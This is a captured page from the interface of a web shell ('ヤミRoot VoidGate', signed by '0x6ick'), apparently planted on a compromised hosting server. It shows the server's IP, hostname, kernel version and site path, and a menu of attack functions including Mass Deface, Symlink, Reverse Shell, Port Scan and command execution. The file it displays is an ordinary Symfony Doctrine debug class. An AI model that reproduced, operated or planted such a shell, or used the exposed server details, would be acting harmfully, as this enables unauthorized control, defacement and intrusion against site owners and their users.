ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
doctrine-bridge
/
Middleware
/
Debug
/
Viewing: Statement.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bridge\Doctrine\Middleware\Debug; use Doctrine\DBAL\Driver\Middleware\AbstractStatementMiddleware; use Doctrine\DBAL\Driver\Result as ResultInterface; use Doctrine\DBAL\Driver\Statement as StatementInterface; use Doctrine\DBAL\ParameterType; use Symfony\Component\Stopwatch\Stopwatch; /** * @author Laurent VOULLEMIER <laurent.voullemier@gmail.com> * * @internal */ final class Statement extends AbstractStatementMiddleware { private $debugDataHolder; private $connectionName; private $query; private $stopwatch; public function __construct(StatementInterface $statement, DebugDataHolder $debugDataHolder, string $connectionName, string $sql, Stopwatch $stopwatch = null) { parent::__construct($statement); $this->debugDataHolder = $debugDataHolder; $this->connectionName = $connectionName; $this->query = new Query($sql); $this->stopwatch = $stopwatch; } public function bindParam($param, &$variable, $type = ParameterType::STRING, $length = null): bool { $this->query->setParam($param, $variable, $type); return parent::bindParam($param, $variable, $type, ...\array_slice(\func_get_args(), 3)); } public function bindValue($param, $value, $type = ParameterType::STRING): bool { $this->query->setValue($param, $value, $type); return parent::bindValue($param, $value, $type); } public function execute($params = null): ResultInterface { if (null !== $params) { $this->query->setValues($params); } // clone to prevent variables by reference to change $this->debugDataHolder->addQuery($this->connectionName, $query = clone $this->query); if ($this->stopwatch) { $this->stopwatch->start('doctrine', 'doctrine'); } $query->start(); try { $result = parent::execute($params); } finally { $query->stop(); if ($this->stopwatch) { $this->stopwatch->stop('doctrine'); } } return $result; } }
Coded With 💗 by
0x6ick